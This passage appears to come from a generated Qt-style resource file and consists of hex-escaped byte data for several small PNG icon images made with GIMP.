xd1\\x72\\x62\\x03\\x55\\x4e\\xf1\\xa6\\\n\\x0e\\x38\\xd5\\x05\\x87\\xf1\\xd7\\x9b\\x37\\x98\\x98\\x98\\x40\\x5f\\x5f\\x1f\\\n\\xda\\xdb\\xdb\\x8d\\xc2\\xc7\\x71\\x1c\\x32\\x99\\x0c\\x04\\x41\\x30\\xe0\\x24\\\n\\x12\\x09\\xc4\\x62\\x31\\x6c\\x6f\\x6f\\x63\\x7e\\x7e\\x1e\\xe7\\xcf\\x9d\\xab\\\n\\xa8\\xf5\\x8b\\x02\\x00\\x00\\x92\\xa9\\x14\\x12\\xc9\\x24\\x64\\x59\\x86\\xdf\\\n\\xef\\x87\\x24\\x49\\xe0\\x38\\x0e\\x1e\\x8f\\x07\\x3b\\x3b\\x3b\\x38\\x38\\x38\\\n\\xc0\\xe6\\xe6\\x26\\x22\\x91\\x08\\xfe\\xde\\xdf\\xb7\\xbc\\x45\\x2e\\x87\\x78\\\n\\x4b\\x00\\xac\\x40\\xc8\\x06\\xa5\\xe1\\xb0\\xe0\\x55\\xd3\\x9a\\x5f\\xf0\\x32\\\n\\x98\\xef\\xef\\x70\\xab\\x45\\xfc\\x17\\xd7\\xae\\x79\\x8b\\xd6\\x07\\x94\\xe3\\\n\\xf6\\x46\\xb1\\x63\\x6c\\x6c\\xec\\x55\\x41\\xad\\x70\\x31\\xd3\\xa1\\x5a\\xad\\\n\\x5f\\x30\\x80\\x6a\\x87\\xf0\\xf9\\xe8\\xe8\\xe5\\xeb\\xd7\\xaf\\xff\\xf6\\x41\\\n\\x9b\\x21\\xbb\\x42\\xb8\\x1d\\x0c\\x52\\x9f\\xcf\\x67\\x69\\x5c\\xf1\\x78\\x9c\\\n\\x88\\xa2\\xc8\\x6a\\xe6\\xc2\\xc4\\xb7\\xf7\\xee\\x51\\x97\\xcb\\x05\\x41\\x10\\\n\\x98\\x99\\x70\\xbd\\xfe\\x89\\xa2\\xa8\\x96\\xec\\xca\\xcc\\xd1\\xce\\xb0\\x94\\\n\\x9b\\x9e\\xc0\\xf8\\x38\\xed\\xe9\\xe9\\x31\\x3e\\x9b\\xfd\\xee\\x39\\x1e\\x8f\\\n\\x53\\x00\\x0c\\x00\\x11\\x45\\x51\\x2b\\xea\\xc8\\x8e\\x82\\xd0\\x8f\\xd1\\xf4\\\n\\xa3\\xb2\\x4a\\x16\\xba\\x2c\\xb3\\x6f\\xc0\\x2a\\xc9\\xd4\\x94\\x3a\\x35\\xaa\\\n\\xf2\\xda\\x5c\\xa9\\x61\\xd8\\xe6\\xe2\\x64\\xb1\\x60\\xd8\\xb1\\xf1\\xfa\\x18\\\n\\x76\\x8c\\x7f\\x00\\xdf\\xa0\\x6a\\x3d\\xf5\\x68\\xb7\\xbc\\x00\\x00\\x00\\x00\\\n\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\xa9\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1e\\x04\\xa3\\x00\\x59\\xdb\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x06\\x0d\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x5b\\x4d\\\n\\x6c\\x13\\x47\\x14\\xfe\\x76\\x76\\xd7\\x0e\\x7b\\x88\\x9d\\x78\\x83\\x65\\xd6\\\n\\x09\\x02\\x15\\x05\\x48\\x82\\x10\\x24\\x97\\xe2\\x00\\x0a\\x6a\\x73\\xe1\\x50\\\n\\x62\\x25\\x41\\x69\\x72\\x40\\x15\\x1c\\x22\\x01\\x52\\x1b\\x89\\x16\\x2e\\xbd\\\n\\x55\\x41\\x95\\x10\\xea\\x85\\x23\\x42\\x3d\\x21\\x44\\x85\\x2a\\xa1\\xa8\\xa2\\\n\\x0d\\xd0\\x43\\x28\\x02\\xc1\\x01\\x42\\x88\\x22\\xa2\\x92\\x3a\\x10\\x14\\x48\\\n\\
x4a\\xc2\\xae\\xd7\\xfb\\x33\\x3d\\x34\\xb6\\x9c\\x60\\x7b\\xd7\\xc1\\x8e\\xbd\\\n\\x36\\xef\\x66\\x7b\\x66\\xbc\\xdf\\xf7\\xbe\\xf7\\xe6\\xcd\\xec\\x0c\\xf0\\xd1\\\n\\xca\\xdb\\x98\\xb5\\xfc\\xb3\\xef\\x4e\\x9d\\xa2\\xd9\\xb4\\xff\\x61\\x70\\x90\\\n\\x71\\x34\\x01\\xd9\\x02\\x2e\\x04\\x19\\x4c\\x31\\x83\\x5e\\x0b\\x32\\x72\\x36\\\n\\xd0\\xf0\\xf0\\xb0\\xef\\xb7\\xa1\\xa1\\xd9\\xb5\\x0c\\xa9\\x5c\\x10\\xc1\\x38\\\n\\xc5\\xeb\\xf9\\x22\\x82\\x71\\x32\\xf0\\x5c\\x90\\xc0\\x94\\x02\\xf8\\xb8\\x6d\\\n\\x90\\xa4\\x6f\\x8f\\x9f\\x38\\x31\\x98\\x77\\x02\\x8a\\x11\\xfc\\x6a\\xd5\\x90\\\n\\xb1\\xa1\\x2c\\xcb\\x0c\\x00\\x08\\x82\\x40\\x9d\\x02\\x3e\\x5b\\x12\\x98\\x54\\\n\\x80\\x57\\x82\\x76\\x1a\\xf8\\x6c\\x48\\x60\\xec\\x00\\x77\\x22\\x78\\xbb\\x24\\\n\\x70\\x99\\x40\\x3b\\x1d\\x7c\\x4e\\x92\\x60\\x29\\x80\\xcf\\xa4\\x02\\x52\\x0e\\\n\\x2b\\xbe\\x4c\\x4e\\x24\\xe5\\x2a\\x7d\\xcb\\x10\\x28\\x45\\xf0\\xa9\\x42\\xa1\\\n\\x2c\\x42\\x20\\x93\\x53\\x49\\xb9\\x4a\\xbf\\x2c\\x15\\x90\\xca\\xb9\\x65\\x47\\\n\\x80\\xa5\\x02\\xca\\x49\\xfe\\x1f\\xac\\x80\\xb9\\xf9\\x79\\x74\\x1d\\x3e\\x8c\\\n\\x27\\x4f\\x9f\\x3a\\x36\\x0c\\x56\\x45\\x40\\x64\\x7a\\x1a\\xbe\\x9a\\x1a\\x7c\\\n\\x33\\x30\\x80\\x6d\\xdb\\xb6\\x41\\x92\\x24\\xdb\\x7d\\x45\\x51\\x2c\\x2a\\x32\\\n\\xb8\\xd5\\xc8\\xff\\xcb\\xde\\x5e\\xec\\xde\\xbd\\x1b\\x55\\x55\\x55\\x50\\x55\\\n\\x15\\xd3\\x91\\x08\\x2a\\xeb\\xeb\\x2d\\xfb\\xb5\\x1d\\x38\\x80\\x4f\\xf7\\xec\\\n\\xc1\\x9f\\xb7\\x6f\\xe3\\xd6\\xcd\\x9b\\xc5\\x47\\x80\\x1d\\xdb\\x52\\x5f\\x8f\\\n\\x50\\x28\\x04\\x96\\x65\\x41\\x29\\x45\\x2c\\x16\\xc3\\x7a\\xbf\\x3f\\x63\\x9f\\\n\\x4d\\x9b\\x36\\xe1\\x8b\\x8e\\x0e\\x50\\x4a\\x41\\x29\\x75\\x6e\\x0e\\xa8\\xf2\\\n\\xf9\\x10\\x0e\\x87\\xc1\\xb2\\x2c\\x4c\\xd3\\x84\\xa6\\x69\\x10\\x04\\x01\\x2e\\\n\\x97\\x2b\\xf5\\xe0\\x84\\xa0\\x23\\x1c\\x46\\x67\\x77\\x37\\x7e\\xbd\\x76\\x0d\\\n\\x43\\xd7\\xaf\\x83\\x52\\x8a\\xc5\\xc5\\xc5\\xa2\\xc9\\x03\\xb6\\x09\\x50\\x54\\\n\\x15\\xe1\\x70\\x18\\x82\\x20\\x2c\\xf3\\x22\\xcb\\xb2\\xd8\\xb5\\x6b\\x57\\xca\\\n\\x3e\\x5f\\x1d\\x3d\\x0a\\x96\\x65\\xf1\\xe3\\xd9\\xb3\\x98\\x98\\x98\\x80\\xc7\\\n\\xeb\\x05\\xc3\\x30\\x98\\x7a\\xfe\\xbc\\x38\\x73\\x40\\x26\\x3b\\x72\\xe4\\x08\\\n\\xfc\\x7e\\x3f\\x74\\x5d\\x4f\\x10\\x40\\x29\\x05\\x21\\x04\\x75\\x75\\x75\\x18\\\n\\x1f\\x1b\\x7b\\xaf\\xcf\\xa5\\x8b\\x17\\xa1\\xaa\\x6a\\xe2\\xb3\\x14\\x0c\\x42\\\n\\x51\\x14\\x44\\xa3\\x51\\x67\\x85\\x80\\x6e\\x9a\\x08\\x04\\x02\\xa8\\xa8\\xa8\\\n\\x58\\xe6\\x7d\\x4a\\x29\\x34\\x4d\\x83\\x3f\\x4d\\x0e\\x48\\x06\\x5f\\x51\\x51\\\n\\x81\\xea\\xea\\x6a\\xc8\\xb2\\x0c\\x5d\\xd7\\x13\\xdf\\x37\\xed\\xd8\\x51\\xfc\\\n\\x0a\\xe8\\xe8\\xe8\\x80\\xd7\\xeb\\x85\\x69\\x9a\\xcb\\x97\\x92\\x0c\\x03\\x4a\\\n\\x29\\x44\\x51\\xc4\\xc4\\xb3\\x67\\xf8\\x64\\xf3\\xe6\\x8c\\xe3\\x08\\x82\\x80\\\n\\x99\\x97\\x2f\\x21\\xcb\\x32\\x44\\x51\\x44\\x67\\x77\\x37\\x38\\x8e\\xc3\\xd3\\\n\\xb1\\x31\\xc4\\x62\\xb1\\xe2\\x24\\xe0\\xd9\\xe4\\x24\\x1a\\x1a\\x1a\\xfe\\x57\\\n\\x42\\x92\\xe7\\xe2\\x66\\x18\\x06\\x3c\\x1e\\x0f\\x9a\\x9b\\x9b\\x31\\xff\\xe6\\\n\\x4d\\xda\\x71\\xd6\\xad\\x5b\\x07\\x41\\x10\\x10\\x89\\x44\\xf0\\x79\\x7b\\x3b\\\n\\x9a\\x5b\\x5a\\xf0\\xfb\\x8d\\x1b\\xb8\\x33\\x32\\x02\\x86\\x61\\x0a\\x1b\\x02\\\n\\x8a\\xa2\\xa4\\x7d\\x02\\xb1\\xa6\\x06\\xd1\\x68\\x34\\xe3\\xf4\\xe5\\x76\\xbb\\\n\\xd1\\xdf\\xdf\\x0f\\xc3\\x30\\xd2\\xb6\\x09\\xd6\\xd6\\x82\\x65\\x59\\xec\\xdb\\\n\\xbf\\x1f\\xeb\\xfd\\x7e\\x9c\\x3f\\x77\\x0e\\x7f\\xdd\\xb9\\x93\\x50\\x91\\x69\\\n\\x9a\\x05\\x99\\x22\\x13\\x39\\x20\\x12\\x89\\x30\\xe9\\xe6\\xf0\\x9a\\x9a\\x9a\\\n\\x94\\xde\\x8f\\x5b\\x2c\\x1
6\\x03\\x21\\x04\\x95\\x5e\\x6f\\xda\\x36\\x63\\x4f\\\n\\x9e\\x60\\x61\\x61\\x01\\xbf\\x5c\\xbd\\x8a\\x9f\\x2f\\x5d\\xc2\\xbb\\x77\\xef\\\n\\x96\\x85\\x52\\xa1\\x54\\x40\\x96\\xe4\\x49\\x25\\x49\\x4a\\x49\\xbf\\xdf\\xef\\\n\\x87\\x69\\x9a\\x20\\x24\\x7d\\xbe\\x34\\x0c\\x03\\x2e\\x97\\x0b\\xa1\\x50\\x28\\\n\\x6d\\x1b\\x4d\\xd3\\xf0\\xd3\\xf9\\xf3\\x18\\x7d\\xfc\\x38\\xf5\\xd6\\xd4\\x12\\\n\\x01\\x86\\x61\\xbc\\x97\\x6b\\x0a\\x3a\\x0b\\x34\\x34\\x34\\x58\\x3e\\x10\\xc3\\\n\\x30\\x30\\x0c\\x03\\x4d\\x4d\\x4d\\x98\\x7f\\xfb\\x36\\x6d\\x3b\\x2b\\x89\\x33\\\n\\x0c\\x03\\x96\\x65\\x6d\\xb5\\x5d\\x33\\x02\\x1e\\x3e\\x7c\\x08\\x8e\\xe3\\x6c\\\n\\x79\\xa5\\xba\\xba\\x1a\\x67\\xce\\x9c\\xc1\\xdf\\x53\\x53\\x19\\xdb\\x59\\x95\\\n\\xc4\\xf1\\xbc\\x10\\x0f\\xbb\\x7c\\x90\\x11\\xdf\\x1f\\xb4\\x24\\x20\\x16\\x8b\\\n\\x41\\xd7\\xf5\\x84\\x67\\xd2\\x99\\x69\\x9a\\x50\\x14\\x05\\x1e\\x8f\\x07\\x7d\\\n\\x7d\\x7d\\x88\\x4c\\x4f\\x5b\\x7a\\x3b\\xd3\\x6f\\x84\\x90\\x44\\xd8\\xe5\\x33\\\n\\x3f\\x90\\x54\\xac\\x24\\xdb\\xf8\\xf8\\x78\\x22\\x4b\\xdb\\x31\\x9e\\xe7\\xd1\\\n\\xd2\\xd2\\x82\\xd6\\xbd\\x7b\\x57\\x05\\x7e\\xe5\\x5a\\xa2\\xe0\\x21\\x30\\x33\\\n\\x33\\x83\\xd9\\xd9\\x59\\x70\\x9c\\xbd\\xaa\\x99\\x52\\x0a\\x9f\\xcf\\x87\\x9e\\\n\\x9e\\x1e\\x6c\\x08\\x06\\x8b\\x72\\x43\\x24\\xd9\\xd1\\x96\\x04\\xd4\\x05\\x83\\\n\\x98\\x9b\\x9b\\x03\\xcf\\xf3\\xb6\\x3c\\x47\\x29\\x85\\x2c\\xcb\\xe0\\x79\\x1e\\\n\\xc7\\x8e\\x1d\\xc3\\x8e\\x9d\\x3b\\x9d\\xb5\\x25\\x96\\x2a\\x0c\\x06\\x07\\x07\\\n\\xf1\\xe2\\xc5\\x0b\\xcb\\x3c\\x90\\x2c\\x71\\x5d\\xd7\\xc1\\x71\\x1c\\x0e\\x1d\\\n\\x3a\\x84\\xc6\\x02\\xd7\\xfb\\x1f\\xbc\\x18\\x92\\x02\\x01\\x8c\\x8c\\x8c\\x64\\\n\\x1d\\x97\\xaa\\xaa\\x82\\x10\\x82\\x9e\\x9e\\x1e\\x1c\\x3f\\x79\\x12\\xda\\x8a\\\n\\x4a\\xb1\\x18\\x36\\x47\\x6c\\xa3\\xb9\\x72\\xe5\\x0a\\x16\\x16\\x16\\xe0\\x76\\\n\\xbb\\x13\\xd3\\x94\\xad\\x95\\xa4\\xae\\x43\\x51\\x14\\x88\\xa2\\x88\\xfe\\xfe\\\n\\x7e\\x48\\xb5\\xb5\\x89\\x69\\xb2\\x10\\xd5\\xdf\\x4a\\x85\\x67\\xf5\\x6e\\x70\\\n\\x2a\\x12\\xc1\\xe9\\xd3\\xa7\\x51\\xbf\\xb4\\xff\\x97\\xbc\\xdc\\xb5\\x93\\xd1\\\n\\xdd\\x6e\\x37\\x00\\xe0\\xd1\\xa3\\x47\\xb8\\x77\\xef\\x1e\\xee\\xde\\xbd\\x0b\\\n\\x6f\\x65\\x65\\x71\\x12\\x90\\x8e\\x04\\x10\\x82\\xbe\\xbe\\x3e\\x6c\\xdd\\xba\\\n\\x15\\x9a\\xa6\\x41\\xd3\\x34\\xdb\\x61\\x41\\x29\\x05\\xcf\\xf3\\xe0\\x38\\x0e\\\n\\xaf\\x5f\\xbf\\xc6\\xfd\\xfb\\xf7\\x71\\x6b\\x78\\xb8\\x60\\xe0\\x01\\x20\\x63\\\n\\x56\\x6b\\x0d\\x85\\xbe\\x4f\\x81\\x02\\x7f\\x0c\\x0f\\x83\\xe7\\x79\\x6c\\xdc\\\n\\xb8\\x11\\x82\\x20\\xd8\\x0a\\x09\\x42\\x08\\x58\\x96\\x85\\xcb\\xe5\\xc2\\xe8\\\n\\xe8\\x28\\x2e\\x5f\\xbe\\x8c\\xa1\\xa1\\x21\\x54\\x65\\x58\\x40\\xe5\\x1b\\xbc\\\n\\xa5\\x02\\xd2\\xaa\\x60\\xc9\\x5e\\xbe\\x7a\\x85\\xae\\xae\\x2e\\x34\\x36\\x36\\\n\\x22\\xb8\\x34\\xe7\\x6b\\x9a\\x06\\x96\\x65\\xa1\\xeb\\x7a\\x62\\xea\\xa4\\x94\\\n\\x42\\x51\\x14\\xcc\\xce\\xce\\x62\\x62\\x62\\x02\\x17\\x2e\\x5c\\xb0\\xdc\\x3c\\\n\\x71\\x04\\x01\\x00\\x10\\x55\\x55\\x28\\xd1\\x28\\x24\\x49\\x42\\x28\\x14\\x82\\\n\\x28\\x8a\\x60\\x59\\x16\\x81\\x40\\x00\\x93\\x93\\x93\\x58\\x5c\\x5c\\xc4\\x83\\\n\\x07\\x0f\\x30\\x35\\x35\\x85\\x7f\\xe7\\xe6\\x0a\\xf2\\x62\\x24\\xd3\\x11\\x19\\\n\\x5b\\x69\\x38\\xdb\\xf7\\x85\\x51\\x55\\x45\\xc5\\x52\\xc2\\x2b\\xa6\\xaa\\x6f\\\n\\xd5\\xd3\\x60\\xb6\\xe7\\x70\\x8b\\x05\\xfc\\x67\\xed\\xed\\xb5\\x39\\xab\\x03\\\n\\xd6\\xe2\\xf6\\x46\\xae\\xad\\xad\\xad\\xed\\x1f\\xcb\\xaa\\x35\\xdb\\x41\\x4b\\\n\\xfa\\xa8\\x6c\\x29\\x90\\xb0\\xa7\\xb5\\x75\\xdf\\xc1\\x83\\x07\\x6f\\xdb\\x6d\\\n\\x5f\\x52\\xc7\\xe5\\x7b\\x7a\\x7b\\x49\\x53\\x53\\x93\
\xad\\xe7\\x92\\x65\\x99\\\n\\x11\\x04\\x81\\x96\\xcc\\x85\\x89\\xaf\\x07\\x06\\x88\\xd7\\xeb\\x05\\xcf\\xf3\\\n\\xd4\\x0a\\x78\\x3c\\xff\\x09\\x82\\x60\\xe4\\xed\\xca\\x4c\\x72\\x65\\x98\\xcf\\\n\\x45\\x4f\\xb8\\xb3\\x93\\x6c\\xdf\\xbe\\x3d\\xf1\\xd9\\xea\\xdc\\xb3\\x2c\\xcb\\\n\\x04\\x00\\x05\\xc0\\x08\\x82\\x60\\xe6\\xf4\\xc9\\x92\\x89\\x88\\x6f\\xa3\\xc5\\\n\\xf7\\xf7\\x0a\\x99\\xe8\\x52\\x78\\x3f\\x41\\x56\\x5e\\x5c\\x93\\xef\\xd0\\x28\\\n\\xca\\x6b\\x73\\xf9\\x26\\xc3\\x31\\x17\\x27\\x73\\x45\\x86\\x13\\x0b\\xaf\\x8f\\\n\\xe6\\x44\\xfb\\x0f\\xda\\xc3\\x92\\x66\\xc7\\x09\\x70\\x9f\\x00\\x00\\x00\\x00\\\n\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\x9e\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1d\\x32\\x47\\x97\\x9f\\x81\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x06\\x02\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x5b\\x4b\\\n\\x6c\\x13\\x47\\x18\\xfe\\x76\\xd6\\x6b\\x3b\\x7b\\x88\\x9d\\x64\\x83\\x65\\x6c\\\n\\x07\\x81\\x5a\\x05\\x91\\x38\\x20\\x48\\x4e\\x75\\x20\\x04\\xb5\\xb9\\x70\\x28\\\n\\xb1\\x08\\xc8\\x4d\\x0e\\xb4\\x80\\x5a\\x23\\x40\\xaa\\x90\\x68\\xe1\\xd2\\x5b\\\n\\x15\\x54\\x09\\xa1\\x5e\\x38\\x22\\xd4\\x0b\\x29\\xa2\\x42\\x95\\x50\\x54\\xd1\\\n\\x46\\xed\\x25\\x14\\x81\\xe0\\x10\\x42\\x41\\x16\\x51\\x49\\x1d\\x0a\\x32\\x84\\\n\\x2a\\x61\\xd7\\xeb\\x7d\\x4c\\x0f\\xb5\\x97\\x84\\xf8\\xb1\\x4e\\xed\\xd8\\x1b\\\n\\xf3\\xdf\\xbc\\x8f\\xf1\\x7c\\xdf\\x7c\\xff\\x63\\x66\\x67\\x80\\xb7\\x56\\xdb\\\n\\xc6\\xac\\xe4\\x9f\\x7d\\x79\\xf2\\x24\\x2d\\xe6\\xf9\\xaf\\x87\\x87\\x19\\x4b\\\n\\x13\\x50\\x2c\\xe0\\x4a\\x90\\xc1\\x54\\x33\\xe8\\x95\\x20\\xa3\\x64\\x0d\\x8d\\\n\\x8d\\x8d\\x35\\xfd\\x34\\x3a\\x9a\\x58\\x49\\x97\\x2a\\x05\\x11\\x8c\\x55\\x46\\\n\\xbd\\x5c\\x44\\x30\\x56\\x06\\x5e\\x0a\\x12\\x98\\xd5\\x00\\x3e\\x63\\x6b\\x7d\\\n\\xbe\\x2f\\x8e\\x1e\\x3b\\x36\\x5c\\x76\\x02\\xaa\\x11\\xfc\\x72\\xd5\\x90\\xf7\\\n\\x41\\x51\\x14\\x19\\x00\\xe0\\x79\\x9e\\x5a\\x05\\x7c\\xb1\\x24\\x30\\xd9\\x00\\\n\\xbf\\x09\\xda\\x6a\\xe0\\x8b\\x21\\x81\\x31\\x03\\xdc\\x8a\\xe0\\xcd\\x92\\x60\\\n\\xcb\\x07\\xda\\xea\\xe0\\x4b\\x12\\x04\\x57\\x03\\xf8\\x7c\\x2a\\x20\\xb5\\x30\\\n\\xe3\\xcb\\x37\\x88\\xa4\\x56\\xa5\\x5f\\xd0\\x05\\x56\\x23\\xf8\\x6c\\xae\\x50\\\n\\x13\\x2e\\x90\\x6f\\x50\\x49\\xad\\x4a\\xbf\\x26\\x15\\x90\\x6d\\x70\\x6b\\x8e\\\n\\x80\\x82\\x0a\\xa8\\x25\\xf9\\xff\\x6f\\x05\\xcc\\xbe\\x7c\\x89\\x81\\xfd\\xfb\\\n\\x71\\xff\\xc1\\x03\\xcb\\xba\\x81\\x6d\\x39\\x0d\\xc4\\x67\\x66\\xd0\\xb1\\x79\\\n\\x33\\x3e\\x3e\\x78\\x10\\x81\\x40\\x00\\x3e\\x9f\\xcf\\xb2\\x0a\\xb0\\x2d\\x47\\\n\\xfe\\x1f\\x0d\\x0e\\x62\\xdb\\xb6\\x6d\\x68\\x68\\x68\\x80\\x2c\\xcb\\x98\\x89\\\n\\xc7\\x51\\xdf\\xda\\x6a\\x7d\\x02\\xcc\\xd8\\xbb\\xad\\xad\\x08\\x85\\x42\\x60\\\n\\x59\\x16\\x94\\x52\\xa4\\x52\\x29\\xac\\xf1\\x78\\x6a\\x23\\x06\\x34\\x34\\x35\\\n\\x21\\x1c\\x0e\\x83\\x65\\x59\\xe8\\xba\\x0e\\x45\\x51\\xc0\\xf3\\x3c\\xec\\x76\\\n\\xbb\\x65\\xd3\\xa1\\x69\\x02\\x24\\x59\\x46\\x38\\x1c\\x06\\xcf\\xf3\\xa0\\xf4\\\n\\xb5\
\xa7\\xb0\\x2c\\x8b\\xad\\x5b\\xb7\\x16\\x7c\\x5f\\x10\\x04\\x6b\\x2b\\xe0\\\n\\xc0\\x81\\x03\\xf0\\x78\\x3c\\x50\\x55\\xd5\\x20\\x80\\x52\\x0a\\x42\\x08\\x5a\\\n\\x5a\\x5a\\xf2\\xbe\\xdb\\xbb\\x6b\\x17\\x3e\\x8d\\x46\\xb1\\xa3\\xa7\\xc7\\x9a\\\n\\x31\\x40\\xd5\\x75\\x78\\xbd\\x5e\\x38\\x9d\\x4e\\xa4\\x52\\x29\\xe3\\x3a\\xa5\\\n\\x14\\x8a\\xa2\\xc0\\x93\\x23\\x06\\xac\\x5f\\xbf\\x1e\\x1f\\xf6\\xf7\\x83\\x52\\\n\\xba\\x48\\x35\\x96\\x53\\x40\\x7f\\x7f\\x3f\\xdc\\x6e\\x37\\x74\\x5d\\x5f\\x3c\\\n\\x95\\x64\\x18\\x50\\x4a\\x21\\x08\\x02\\x62\\x8f\\x1e\\xbd\\x6e\\x94\\x10\\xf4\\\n\\x87\\xc3\\xd8\\xbb\\x6f\\x1f\\x7e\\xbc\\x7a\\x15\\xa3\\xd7\\xae\\x81\\x52\\x8a\\\n\\xf9\\xf9\\x79\\xeb\\x11\\xf0\\x68\\x6a\\x0a\\x6d\\x6d\\x6d\\xff\\x29\\x41\\x55\\\n\\x97\\xdc\\xd7\\x34\\x0d\\x2e\\x97\\x0b\\x9d\\x9d\\x9d\\xc6\\xb5\\x4f\\x0e\\x1d\\\n\\x02\\xcb\\xb2\\xf8\\xe6\\xcc\\x19\\xc4\\x62\\x31\\xb8\\xdc\\x6e\\x30\\x0c\\x83\\\n\\xe9\\xc7\\x8f\\x97\\xbc\\x5f\\x69\\x65\\x10\\x00\\x90\\x24\\x29\\xe7\\xba\\x80\\\n\\xd0\\xdc\\x8c\\x64\\x32\\x99\\xb7\\xa3\\x0e\\x87\\x03\\xd1\\x68\\x14\\x9a\\xa6\\\n\\x01\\x00\\x2e\\x5e\\xb8\\x80\\xef\\x47\\x46\\x0c\\xc5\\xf8\\xfc\\x7e\\x48\\x92\\\n\\x84\\x64\\x32\\xb9\\x74\\x41\\x22\\xad\\x22\\x5d\\xd7\\x2b\\x42\\x86\\xa1\\x80\\\n\\x78\\x3c\\xce\\xe4\\xf2\\xe3\\xe6\\xe6\\xe6\\xac\\xa3\\x9f\\xb1\\x54\\x2a\\x05\\\n\\x42\\x08\\xea\\xdd\\x6e\\x00\\x80\\x2c\\xcb\\xc6\\x3d\\xa7\\xd3\\x89\\xc6\\xc6\\\n\\x46\\x88\\xa2\\xb8\\xa8\\x8d\\x60\\x47\\xc7\\x22\\x12\\x18\\x86\\xa9\\x9c\\x02\\\n\\xea\\xea\\xea\\xa8\\xcf\\xe7\\xcb\\x4a\\xbf\\xc7\\xe3\\x81\\xae\\xeb\\x20\\x24\\\n\\xb7\\xb7\\x68\\x9a\\x06\\xbb\\xdd\\x8e\\x50\\x28\\x94\\xf5\\x3e\\xcf\\xf3\\x98\\\n\\x7d\\xf1\\x02\\xa2\\x28\\x42\\x10\\x04\\x7c\\x76\\xe4\\x08\\x7a\\x76\\xee\\x5c\\\n\\x54\\x3f\\x64\\x08\\xd0\\x34\\x6d\\x49\\xac\\xa9\\x68\\x16\\x68\\x6b\\x6b\\x2b\\\n\\xd8\\x21\\x86\\x61\\xa0\\x69\\x1a\\x82\\xc1\\x20\\x2e\\x5d\\xba\\x04\\x77\\x7d\\\n\\xbd\\x71\\xaf\\xae\\xae\\x0e\\x3c\\xcf\\x23\\x1e\\x8f\\xe3\\x83\\xbe\\x3e\\x74\\\n\\x76\\x75\\xe1\\xe7\\xeb\\xd7\\xf1\\xfb\\x8d\\x1b\\x59\\xdb\\xc9\\x14\\x59\\x94\\\n\\xd2\\x15\\x51\\x45\\xc1\\x20\\x78\\xf7\\xee\\x5d\\xd8\\x6c\\x36\\x53\\xa3\\xd2\\\n\\xd8\\xd8\\x88\\xd3\\xa7\\x4f\\xe3\\xcf\\xe9\\x69\\xe3\\x9a\\x3f\\x10\\x00\\xcb\\\n\\xb2\\xd8\\xd1\\xd3\\x83\\x35\\x1e\\x0f\\xce\\x9d\\x3d\\x8b\\x1b\\xe3\\xe3\\x79\\\n\\xfd\\x3d\\x13\\x17\\x32\\x2e\\x53\\x8e\\xd8\\x90\\x59\\x1f\\x2c\\x48\\x40\\x2a\\\n\\x95\\x82\\xaa\\xaa\\x60\\x59\\x36\\xef\\x73\\xba\\xae\\x43\\x92\\x24\\xb8\\x5c\\\n\\x2e\\x0c\\x0d\\x0d\\x21\\x3e\\x33\\x03\\x00\\xf8\\xe3\\xfe\\x7d\\xcc\\xcd\\xcd\\\n\\xe1\\x87\\x2b\\x57\\xf0\\xdd\\xc5\\x8b\\x78\\xf5\\xea\\xd5\\x22\\xc9\\xe7\\x22\\\n\\x80\\x10\\x62\\xb8\\x5d\\x39\\x95\\x40\\xb2\\xb1\\xb2\\xd0\\x1e\\x3e\\x7c\\x68\\\n\\x44\\x69\\x33\\xc6\\x71\\x1c\\xba\\xba\\xba\\xd0\\xbd\\x7d\\x3b\\x00\\x40\\x51\\\n\\x14\\x7c\\x7b\\xee\\x1c\\x26\\xef\\xdd\\x5b\\xe2\\xef\\x05\\x3b\\x47\\x48\\xe5\\\n\\x5d\\xe0\\xe9\\xd3\\xa7\\x48\\x24\\x12\\xb0\\xd9\\xcc\\x4d\\x1c\\x29\\xa5\\x68\\\n\\x6a\\x6a\\x42\\x24\\x12\\xc1\\x5a\\xbf\\xbf\\x2a\\x72\\x7d\\x2e\\xf9\\x9b\\x22\\\n\\xa0\\xc5\\xef\\xc7\\x